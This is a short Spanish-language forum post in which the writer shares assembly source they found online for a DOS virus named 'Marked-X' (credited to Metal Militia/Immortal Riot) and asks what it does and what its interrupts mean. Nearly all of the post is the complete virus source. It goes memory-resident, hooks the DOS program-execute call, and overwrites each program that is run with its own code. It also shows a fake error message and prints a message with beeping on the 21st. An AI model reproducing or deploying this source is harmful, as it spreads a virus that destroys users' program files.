Buscando por la red me encontre este virus en codigo de ensamblador pero tengo algunas dudas sobre su funcionamientoy que hace especificamente , me podrian ayudar xfa, necesito saber que hace y algunas de sus interrupciones desde ya gracias.
virus segment
assume cs:virus,ds:virus
org 100h
start: mov ah,2ah
int 21h
cmp dl,21
je happy_happy_joy_joy
mov ah,9h
mov dx,offset note
int 21h
jmp makemegotsr
happy_happy_joy_joy:
mov ah,9h
mov dx,offset society
int 21h
mov cx,1000
mov ax,0e07h
beeper:
int 10h
loop beeper
makemegotsr:
jmp tsrdata
new21: pushf
cmp ah,4bh
jz infect
jmp short end21
infect: mov ax,4301h
and cl,0feh
int 21h
mov ax,3d02h
int 21h
mov bx,ax
push ax
push bx
push cx
push dx
push ds
push cs
pop ds
mov ax,4200h
xor cx,cx
cwd
int 21h
mov cx,offset endvir-100h
mov ah,40h
mov dx,100h
int 21h
cwd
xor cx,cx
mov ax,5701h
int 21h
mov ah,3eh
int 21h
x21: pop ds
pop dx
pop cx
pop bx
pop ax
end21: popf
db 0eah
old21 dw 0,0
data db 'Marked-X' ; Virus name
db 'Will we ever learn to talk with eachother?'
db '(c) Metal Militia/Immortal Riot' ; Virus author
society db 'In any country, prison is where society sends it''s',0dh,0ah
db 'failures, but in this country society itself is faily',0dh,0ah
db '$' ; Information note
note db 'Bad command or filename',0dh,0ah
db '$' ; Fake note
tsrdata:
mov ax,3521h
int 21h
mov word ptr cs:old21,bx
mov word ptr cs:old21+2,es
mov dx,offset new21
mov ax,2521h
int 21h
push cs
pop ds
mov dx,offset endvir
int 27h
endvir label byte
virus ends
end start
